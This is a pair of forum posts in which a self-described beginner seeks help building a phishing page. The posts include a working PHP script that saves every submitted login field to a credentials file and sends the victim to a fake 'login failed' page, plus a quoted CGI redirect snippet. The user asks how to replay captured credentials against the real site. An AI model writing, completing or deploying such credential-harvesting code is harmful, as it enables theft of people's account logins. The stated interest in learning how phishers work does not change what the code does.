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Posts posted by glum

  1. Thank you for your help digip. Actually, although I only tested it on my own computer, the first script works fine, the credentials are logged in and even if the file credentials.txt isn't there it is somehow createde by the script.

    The problem I was having was with the logging in the real page for the client, besides just redirecting him to the "login failed" page. I will try to find your post then and study it =)

  2. Hello everyone, first of all just wanted to introduce myself, and hope that I can learn from this forum and also contribute to the sharing of knowledge =)

    I am trying to learn more about phishers and some of the techniques they use nowadays. And because my PHP is really bad (I'm trying to work on it =P) I was wondering if you could help me with creating a script that not only logs an imput text, but also uses that text as a login in the real page.

    After some research I learned about the basic fake login script:

    header ('Location: http://failedloginpage');
    $handle = fopen("credentials.txt", "a");
    foreach($_POST as $variable => $value) {
       fwrite($handle, $variable);
       fwrite($handle, "=");
       fwrite($handle, $value);
       fwrite($handle, "\r\n");
    fwrite($handle, "\r\n");

    Where after loging in you are redirected to the real page with a failed login.

    After some more research I found a book called Phishing Exposed where there was this code that allowed to record credentials and use them to send POST to the real website with the user credentials.

    URI='echo "${REQUEST_URI}" | sed -e 's@.*/cgi/@/cgi/@''
    # Give CGI header and start web page
    echo "Status: 301 Moved
    Content-Type: text/html
    Location: http://${RSERVER}${URI}
    This page has moved to
    <a href=\"http://${RSERVER}${URI}\">http://${RSERVER}${REQUEST_URI}</a>
    This code takes the URI in REQUEST_URI and removes everything up to
    /cgi/ (provided /cgi/ is contained within the URI) and places the results in URI.
    For example, if REQUEST_URI were http://foo.com/stuff/cgi/Login.cgi, the
    URI would be /cgi/Login.cgi.Then when a header and HTML are sent to the
    client’s browser, stating that we have a different location, the request will trans-
    parently move to http://bank.securescience.net/cgi/Login.cgi

    I know this is probably pretty simple, but I am a begginer regarding scripting, so can you please help me make sense of this? What would I need to implement in the first script to be able to do the redirecting?

    Thank you =)

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